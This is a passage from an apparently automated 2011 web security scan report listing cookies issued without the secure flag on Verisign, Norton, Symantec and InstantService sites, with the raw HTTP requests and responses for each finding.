Connection: close
Content-Type: text/html;charset=utf-8


6.2. https://admin.instantservice.com/links/5851/14753  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/14753

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/14753 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:49 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=44FE3736608A2C17EACC6E31AB906A9B; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5905
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

6.3. https://admin.instantservice.com/links/5851/16144  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16144

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16144 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=0B3AF203D82136BD07783C04277FEF66; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5858
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

6.4. https://admin.instantservice.com/links/5851/16145  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/16145

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/16145 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=13A178978A8AF485E01EA735265A1159; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5853
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#65;
...[SNIP]...

6.5. https://admin.instantservice.com/links/5851/39897  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://admin.instantservice.com
Path:   /links/5851/39897

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /links/5851/39897 HTTP/1.1
Host: admin.instantservice.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:36:50 GMT
Server: Apache
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: JSESSIONID=A931592882D97BC2DB5C2B6F4668C8C6; Path=/isservices
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Vary: User-Agent,Accept-Encoding
Content-Length: 5946
Connection: close
Content-Type: text/html;charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>&#86;&#82;&#83;&#78;&#32;&#83;&#97;&#108;&#101;&#115;&#32;&#85;
...[SNIP]...

6.6. https://onlinefamily.norton.com/familysafety/loginStart.fs  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://onlinefamily.norton.com
Path:   /familysafety/loginStart.fs

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /familysafety/loginStart.fs?inid=us_2010June_NOF HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:55 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:55 GMT; Path=/
Set-Cookie: formVersion=1315604755623; Path=/
Set-Cookie: JSESSIONID=C487A83A71391D525794280EAF628915; Path=/familysafety
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 37906


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <
...[SNIP]...

6.7. https://securitycenter.verisign.com/celp/enroll/outsideSearch  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/outsideSearch

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/outsideSearch HTTP/1.1
Host: securitycenter.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:46:33 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqJ57BcEDySGMZg17yokdHt03FquFgyYGEezg44I0uZ1diTyCIN7!-1800460983; path=/
Accept-Ranges: bytes
Connection: close

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.8. https://securitycenter.verisign.com/celp/enroll/retail  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/retail

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/retail;jsessionid=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); JSESSIONID=OqE0Tm00XOqZIfwiE7FczMWMMOkVjg1izXQLLDKjlcyrNzI8OY4a!-1800460983

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:43:53 GMT
Content-length: 408
Content-type: text/html
Last-Modified: Mon, 12 Jan 2004 23:04:38 GMT
Set-Cookie: JSESSIONID=OqIZWIQD33u9AZA3Ap2HnemKDA9cEWwlrgBQZ31zh5e1fWNs3qL2!-1800460983; path=/
Accept-Ranges: bytes

<html>
<head>
<title>VeriSign Retail</title>
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
</head>
<body bgcolor="#ffffff">

<h1>System Unavailable</h1>

...[SNIP]...

6.9. https://securitycenter.verisign.com/celp/enroll/upsell  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://securitycenter.verisign.com
Path:   /celp/enroll/upsell

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /celp/enroll/upsell?application_locale=VRSN_US&originator=VeriSign:CELP&bundle_id=MSIECS002 HTTP/1.1
Host: securitycenter.verisign.com
Connection: keep-alive
Referer: http://www.verisign.com/code-signing/index.html?tid=a_box
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; mbox=session#1315621455064-973488#1315623519|PC#1315621455064-973488.19#1378693659|check#true#1315621719; TLTHID=7940A5B8DB2A10DB6AA3CEC4D1E75D2A; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.7.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 302 Moved Temporarily
Server: Sun-ONE-Web-Server/6.1
Date: Fri, 09 Sep 2011 21:27:18 GMT
Content-type: text/html;charset=UTF-8
Location: https://securitycenter.verisign.com/celp/enroll/retail
Set-Cookie: JSESSIONID=OqE10CQDoczcE12dL3a6BYK7SmniMvBhWXtc1NQr68hhq3LGOaAg!-1800460983; path=/
Content-Length: 303

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="https://securitycenter.verisign.co
...[SNIP]...

6.10. https://onlinefamily.norton.com/familysafety/basicpremium.fs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://onlinefamily.norton.com
Path:   /familysafety/basicpremium.fs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /familysafety/basicpremium.fs HTTP/1.1
Host: onlinefamily.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:45:30 GMT
Server: Apache
Set-Cookie: user_pref_lang=eng; Expires=Thu, 08-Dec-2011 21:45:30 GMT; Path=/
Set-Cookie: formVersion=1315604730862; Path=/
Cache-Control: no-cache,no-store,must-revalidate,max-stale=0
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/html;charset=UTF-8
Connection: close
Vary: Accept-Encoding
Content-Length: 41316


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
   <meta http-equiv="content-type" content="text/html; charset=utf-8" />
   <title>Web Moni
...[SNIP]...

6.11. https://renewals.symantec.com/renewals/application  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /renewals/application

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store HTTP/1.1
Host: renewals.symantec.com
Connection: keep-alive
Referer: http://www.symantec.com/business/verisign/fraud-detection-service?tid=gnps
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|2735422985161DC5-600001A3801B01DD[CE]; s_pers=%20s_nr%3D1315621879623-New%7C1336357879623%3B%20event69%3Devent69%7C1336357879625%3B; s_sess=%20s_sv_sid%3D806960442771%3B%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_sv_112_s1=1@16@a//1315621570007; s_sv_112_p1=1@25@s/6036/5742/5736/5417&e/5

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:31:50 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: entryURL=/renewals/application?source_code=WEB&entry_point=sym_lrc&inid=us_pagenotfound_smb_store
Content-Length: 21436

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" />


<!-- BEGIN
...[SNIP]...

6.12. https://ssl-certificate-center.verisign.ch/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34B2B6D6DB2D10DB60D0D1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11755

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.13. https://ssl-certificate-center.verisign.ch/process/retail/production_trial_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.ch
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial?productType=HASGCServer&application_locale=VRSN_CH HTTP/1.1
Host: ssl-certificate-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:42 GMT
Server: Apache
Set-Cookie: TLTHID=34FAB86EDB2D10DB68C5A5440567C536; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.ch/process/retail/production_trial_product_selector?uid=fb69022a800687aee2281387e3be2beb&product=GHAPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.14. https://ssl-certificate-center.verisign.com/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:43 GMT
Server: Apache
Set-Cookie: TLTHID=35539628DB2D10DB528F9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11759

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.15. https://ssl-certificate-center.verisign.com/process/retail/production_trial_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/production_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/production_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:44 GMT
Server: Apache
Set-Cookie: TLTHID=35B1A6C8DB2D10DB52919F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/production_trial_product_selector?uid=21e134a09c6b802996d1066fe9c13ef5&product=GSPT001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.16. https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://ssl-certificate-center.verisign.com
Path:   /process/retail/trustseal_trial_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trustseal_trial_initial HTTP/1.1
Host: ssl-certificate-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:45 GMT
Server: Apache
Set-Cookie: TLTHID=36315378DB2D10DB52939F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://ssl-certificate-center.verisign.com/process/retail/trustseal_trial_new_account?uid=9e535ad90e202dd2be1657e6ee2caf70&product=TRUSTSEALTRIAL
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.17. https://trust-center.verisign.ch/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=37115F40DB2D10DB60DAD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 11715

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.18. https://trust-center.verisign.ch/process/retail/trust_initial  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.ch
Path:   /process/retail/trust_initial

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/trust_initial HTTP/1.1
Host: trust-center.verisign.ch
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:46:46 GMT
Server: Apache
Set-Cookie: TLTHID=372B7DB2DB2D10DB60DBD1C1D953344E; Path=/; Domain=.verisign.ch
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Location: https://trust-center.verisign.ch/process/retail/trust_product_selector?uid=2f451e38320cb4cf9a868171c06fe1c9&product=TRUSTSEAL001
Content-Length: 0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html


6.19. https://trust-center.verisign.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
Host: trust-center.verisign.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=1744DAB8D140F63E; IS3_History=0-0-0____; IS3_GSV=DPL-0_TES-1315621562_PCT-1315621562_GeoIP-*_GeoCo-_GeoRg-_GeoCt-_GeoNs-_GeoDm-; mbox=check#true#1315621641|session#1315621455064-973488#1315623441|PC#1315621455064-973488.19#1378693581; __utma=136906671.1087027796.1315621458.1315621458.1315621458.1; __utmb=136906671.4.10.1315621458; __utmc=136906671; __utmz=136906671.1315621458.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); TLTSID=621E7D88DB2A10DB44A3B1847A7DDBAF; TLTUID=621E7D88DB2A10DB44A3B1847A7DDBAF; JSESSIONID=8EDEEDCA5D5FDB78FD13458CCB776941; TLTHID=692D91C2DB2A10DB44B9B1847A7DDBAF

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:26:45 GMT
Server: Apache
Set-Cookie: TLTHID=6B107EF0DB2A10DB6A8ACEC4D1E75D2A; Path=/; Domain=.verisign.com
Last-Modified: Fri, 27 May 2011 21:56:07 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 4710
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/x-icon

...... ..........F... ......................h...............(...>...(... ...@.......................................            ................. !....)...9.'&'.(*&.)*(.44-.=?8.BC?...U...]...a.        d...i.    .h...
...[SNIP]...

6.20. https://trust-center.verisign.com/process/retail/console_login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/console_login

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/console_login HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:48 GMT
Server: Apache
Set-Cookie: TLTHID=383DEE10DB2D10DB49FEB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 12062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.21. https://trust-center.verisign.com/process/retail/help_and_support  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/help_and_support

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/help_and_support HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Fri, 09 Sep 2011 21:46:53 GMT
Server: Apache
Set-Cookie: TLTHID=3B56F1FADB2D10DB4A1EB1847A7DDBAF; Path=/; Domain=.verisign.com
Cache-Control: no-cache
Expires: Thu, 01 Dec 1994 16:00:00 GMT
X-Powered-By: Servlet 2.4; JBoss-4.3.0.GA_CP04 (build: SVNTag=JBPAPP_4_3_0_GA_CP04 date=200902200048)/JBossWeb-2.0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html;charset=utf-8
Content-Length: 138732

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF
...[SNIP]...

6.22. https://trust-center.verisign.com/process/retail/redirect  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://trust-center.verisign.com
Path:   /process/retail/redirect

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /process/retail/redirect HTTP/1.1
Host: trust-center.verisign.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Date: Fri, 09 Sep 2011 21:47:00 GMT
Server: Apache
Set-Cookie: TLTHID=3F6ECAD8DB2D10DB52FC9F6CAED9DACC; Path=/; Domain=.verisign.com
Cache-Control: no-cache
